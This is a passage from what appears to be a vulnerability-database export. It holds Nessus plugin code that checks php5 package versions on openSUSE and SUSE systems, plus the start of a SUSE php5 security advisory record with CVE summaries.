rpm_check(release:\"SUSE42.2\", reference:\"php5-opcache-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-openssl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-openssl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pcntl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pcntl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pdo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pdo-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pear-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pgsql-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pgsql-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-phar-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-phar-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-posix-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-posix-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pspell-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pspell-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-readline-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-readline-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-shmop-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-shmop-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-snmp-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-snmp-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-soap-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-soap-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sockets-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sockets-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sqlite-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sqlite-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-suhosin-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-suhosin-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvmsg-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvmsg-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvsem-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvsem-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvshm-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvshm-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tidy-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tidy-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tokenizer-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tokenizer-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-wddx-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-wddx-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlreader-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlreader-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlrpc-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlrpc-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlwriter-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlwriter-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xsl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xsl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zip-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zip-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zlib-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zlib-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php5-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php5-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bcmath-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bcmath-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bz2-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bz2-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-calendar-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-calendar-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ctype-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ctype-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-curl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-curl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dba-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dba-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-debugsource-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-devel-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dom-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dom-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-enchant-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-enchant-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-exif-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-exif-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fastcgi-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fastcgi-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fileinfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fileinfo-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-firebird-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-firebird-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fpm-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fpm-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ftp-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ftp-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gd-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gd-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gettext-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gettext-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gmp-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gmp-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-iconv-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-iconv-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-imap-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-imap-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-intl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-intl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-json-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-json-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ldap-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ldap-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mbstring-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mbstring-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mcrypt-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mcrypt-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mssql-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mssql-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mysql-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mysql-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-odbc-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-odbc-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-opcache-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-opcache-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-openssl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-openssl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pcntl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pcntl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pdo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pdo-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pear-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pgsql-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pgsql-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-phar-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-phar-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-posix-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-posix-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pspell-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pspell-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-readline-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-readline-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-shmop-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-shmop-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-snmp-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-snmp-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-soap-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-soap-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sockets-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sockets-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sqlite-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sqlite-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-suhosin-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-suhosin-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvmsg-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvmsg-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvsem-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvsem-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvshm-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvshm-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tidy-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tidy-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tokenizer-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tokenizer-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-wddx-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-wddx-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlreader-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlreader-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlrpc-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlrpc-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlwriter-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlwriter-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xsl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xsl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zip-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zip-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zlib-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zlib-debuginfo-5.5.14-82.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T14:26:18", "description": "This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX\n deserialization of booleanparameters could be used by\n attackers able to inject XML for deserialization tocrash\n the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of\n service (bsc#1050241)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2017:2317-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:php5-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fpm", "p-cpe:/a:novell:suse_linux:php5-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php5-json-debuginfo", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-intl", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-phar", "p-cpe:/a:novell:suse_linux:php5-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-sqlite", "p-cpe:/a:novell:suse_linux:php5-debugsource", "p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sockets", "p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php5-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-enchant", "p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-opcache", "p-cpe:/a:novell:suse_linux:php5-mysql", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo", "p-cpe:/a:novell:suse_linux:php5-posix", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php5-snmp", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-zlib", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-imap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pdo", "p-cpe:/a:novell:suse_linux:php5-imap", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php5-shmop"], "id": "SUSE_SU-2017-2317-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2317-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120004);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-7890\");\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2017:2317-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX\n deserialization of booleanparameters could be used by\n attackers able to inject XML for deserialization tocrash\n the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() in Zend/zend_ini_parser.c 